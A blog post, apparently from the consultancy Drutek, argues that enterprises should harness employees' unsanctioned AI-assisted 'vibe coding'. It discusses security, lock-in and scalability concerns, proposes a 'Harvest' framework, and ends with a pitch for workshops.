Your teams are already using tools such as Claude Code, Cursor and Bolt. This isn't a problem to stamp out but in-fact it's a signal of unmet needs and untapped innovation.
The Candy Problem: What to Do When Your Teams Are Already Vibe Coding
Let's face it, if you keep the kids away from the candy they're going to go and find it anyway. The thing is though that unlike calorific chocolate bars or tooth-breaking gobstoppers, the harm that developers may inflict upon an enterprise in using unsanctioned toys can be catastrophic or it can be something rather wonderful.
Output is now incredibly cheap. With the right introductory training and skilling up, most people are now able to build applications that would have taken a full team and many months of boring stakeholder meetings to produce. But what do we actually gain by this rapid development? Are these pieces of code bundled together rigid enough to pass the scrutiny of legal review or are they just throwaway prototypes? The truth is probably somewhere in the middle.
The Hidden Value in "Shadow" Experiments
The sheer look of joy on a designer's face when they create a working application from scratch by themselves with the aid of vibe coding tools, at least for me, is delightful. One should never gatekeep such experiences and it's honestly why engineering is rather addictive. The feeling of compiling your code and seeing the pixels light up in the right order at the right time is truly one of life's delights.
Previously, this experience was locked behind bureaucracy and multiple layers of getting things done. Now of course, it's behind a chatbox and employees from the humble associate to the CEO can become creators.
This should be encouraged, but in a safe space without customer or patient data in areas which are non business critical. Employees are finding friction, manifesting ideas into reality and creating real solutions.
The Legitimate Concerns
What Have We Even Made?
If a program has been created in a one-shot prompt and contains hundreds if not thousands of lines of code then does anyone truly know how it works? Given the fact that context windows are still limited it's likely that complex applications that have been vibecoded with Claude Code or other agentic coding solutions won't fit into the full memory so even the LLM won't know how everything works. And that's OK most engineers and humans working on a solution also won't be able to recite off memory how everything works.
The thing is where this changes though is where you get experienced human teams that have built frameworks together and have suffered those 4am calls will be able to collectively pool their knowledge together in order to solve a problem. An oldschool mixture of experts, if you like.
Security
Code is tested in battle and oftentimes this battle has already happened and software has introduced mitigations to make sure that events don't reoccur.
Let's take the famous Heartbleed vulnerability. This was a bug within OpenSSL, which is a library that underpins a huge chunk of the encrypted web. A missing bounds check in a "heartbeat" feature meant that an attacker could ask a server to hand over chunks of its memory which can include private keys and passwords. When this was found though experienced devs with confidence in the software that they may not have made themselves but have first hand experience in its curation and creation released an elegant fix.
Then let's take Log4Shell, a vulnerability in the Java logging lib Log4j. This exploit could have been used to execute arbitrary code via a crafted string. This was patched again quickly by humans who knew how it worked and fixes were rolled out.
A question here is though if we treat our code like a black box and we are all prompt engineers then how can we stake our lives on a fix being even possible or valid?
Vendor Lock-In
This is an obvious one and it's been the case with a lot of CMS tools in the past and one of the reasons why Drupal was just so attractive to Enterprise customers. If you're writing something with bolt.new or lovable you're able to take that away and continue working on the codebase. However, other tools such as Bubble, Adalo and Softr do not let you take the source code bundle and take it elsewhere (as of the time of writing).
n8n for example is a wonderful tool but good luck taking that away and turning it into something you can run without n8n running in the background. I'll return to n8n later when I discuss scalability.
This is why it must be considered that you're able to liberate the code from the tool afterwards and have the ability to hand it over to industry standard tooling to either take it the last mile or re-write it in approved tooling.
Scalability
A simple single prompt that is used to create a tool is unlikely to be sufficient to cover all of the edge-cases. In fact our testing has shown that even an in-depth prompt can suffer prompt drift and it may not even complete all the tasks. In some cases, personally, I have found that it silently forgets about buried requirements in very long prompts and they're memoryholed.
These requirements do often relate to scalability and it's a factor that consistently has to be taken into account. A lesser experienced new vibecoder may well say that they want a feature on their freshly made personal blog to measure analytics to see how popular their articles are. An experienced developer or architect would naturally use their experience within their domain and company and pick out an established platform to interface with. A mid-level developer may well wire up something asynchronous to ping the backend to increment a counter. An LLM might do it all server side causing caching issues and all sorts of tomfoolery.
The thing is this isn't looking down on the junior developer or the LLM but the wrinkles and bags under our eyes have these stories etched into them where we've had slow loading sites and stakeholders grilling us about churn and poor performance. These memories have more impact than 100k tokens does on an LLM.
¿Dónde está nuestro error sin solución? - Alaska y Dinarama, 1984
The problems here shouldn't be resolved by a bigger and better LLM but instead it should motivate us to harvest these innovative solutions, ideas and patterns and mould them into frameworks that are battle tested and most importantly have iron clad contracts and assurances behind them that make them suitable to hold confidential patient and customer information.
That's not to say that we shouldn't be using AI accelerated coding platforms. In fact we're advocating the opposite of this but its use should be gradual and moderated. Even if we don't write every line of code, we must understand every line and how it fits into the greater architecture of the tool. Knowledge must live in neurons and not locked into tokens of context because when that 4am call comes and the blood drains from your face with your heart skipping a beat because there's a security issue there's one scenario that's worse and that's the one where you don't know how to fix it.
The Harvest Framework
I'm suggesting a draft framework for harvesting these ideas which consists of:
- Identify the problem and roughly sketch it out. Roughly is key here! Don't solutionise or enable your existing biases to come into affect here. We need to harvest that untapped experience across the entire organisation!
- Enable and allow every individual that is interested in the problem to provide a solution at whatever level they feel comfortable with.
- Evaluate the general premise and document it using industry standard documentation principles (ADRs, flow chart diagrams, that sort of goodness).
- Integrate the solution that follows your capability and business views. So this could be using alternative tools like Copilot Studio instead of n8n or Python instead of Rust (or vice-versa).
- Use AI to help you craft that but AI must never have the final say on what goes live.
If an organisation can do this then they no longer have a development team of a few but everyone can, in their own way, truly combine their efforts to reinforce the outcome of a company.
This In Practice: An LLM Gateway
I'll share a real example from my own experience. I built a Rust-based LLM gateway that provided analytics, usage metrics, and allowed users across an organisation to access multiple LLM tools including the company's internal models via an OpenAI-compatible API.
The tool was nominally adopted and proved the concept worked. Then something happened that, in the old world, would have felt like a waste: a larger team took it over and rewrote the entire thing in Python because that's their preferred language and what they can support long-term.
Previously, this would have stung. Months of work, rewritten from scratch. But here's the thing because output is now cheap, that initial Rust implementation wasn't months of work. It was days. The value wasn't in the code itself but in the validated idea, the proven architecture, and the documented requirements that emerged from actually building it.
The Python team didn't start from a requirements document written by someone who'd never built it. They started from a working system they could run, test, and understand. That's the harvest in action.
How Drutek Can Help
Drutek has experience embedding within Enterprise level teams and can help train your developers and non-technical people into being experts with modern application development tools such as Cursor, Claude Code, Copilot Studio, Bolt.new and Lovable.
More importantly, we can help you build the frameworks and processes to harvest the innovation already happening across your organisation capturing the ideas, documenting the patterns, and translating them into production-ready solutions on approved platforms.
We seek to empower the previously unempowered and make a world where the gatekeepers are vanquished and all can create.
Interested in running a Harvest workshop with your team? Get in touch.

Top comments (0)